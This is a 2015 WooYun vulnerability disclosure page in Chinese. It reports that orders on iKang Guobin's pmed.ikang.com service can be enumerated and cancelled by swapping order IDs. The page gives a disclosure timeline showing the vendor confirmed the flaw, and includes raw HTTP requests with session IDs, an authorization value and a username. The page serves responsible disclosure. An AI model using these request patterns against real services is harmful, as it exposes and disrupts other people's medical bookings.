WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150503

漏洞标题：爱康国宾某种可遍历用户订单信息并取消

相关厂商：爱康国宾

漏洞作者： Focusstart

提交时间：2015-10-30 08:37

修复时间：2015-12-17 11:38

公开时间：2015-12-17 11:38

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

4人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2015-10-30： 细节已通知厂商并且等待厂商处理中
2015-11-02： 厂商已经确认，细节仅向厂商公开
2015-11-12： 细节向核心白帽子及相关领域专家公开
2015-11-22： 细节向普通白帽子公开
2015-12-02： 细节向实习白帽子公开
2015-12-17： 细节向公众公开

简要描述：

爱康国宾某种可遍历用户订单信息并取消

详细说明：

GET /personalizedRun/order/view/1446135404032555.json;jsessionid=5C70AFFFA09C5EE4F54E85893856546B HTTP/1.1
Host: pmed.ikang.com
Proxy-Connection: keep-alive
Authtype: 2
Origin: http://m.t.ikang.com
source: ikang
Authorization: 186fa15ade912b120254609696c3d3de
MemberId:
Accept: application/json, text/plain, */*
Username: lovejones1314520
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://m.t.ikang.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

漏洞证明：

OPTIONS /personalizedRun/order/cancleOrder/1446131041199561.json;jsessionid=D3B88BAE18BCB056E44BC683FEF0AAB3 HTTP/1.1
Host: pmed.ikang.com
Proxy-Connection: keep-alive
Access-Control-Request-Method: GET
Origin: http://m.t.ikang.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Access-Control-Request-Headers: authtype, accept, username, source, authorization, memberid
Accept: */*
Referer: http://m.t.ikang.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

修复方案：

版权声明：转载请注明来源 Focusstart@乌云

漏洞回应

漏洞评价：

评论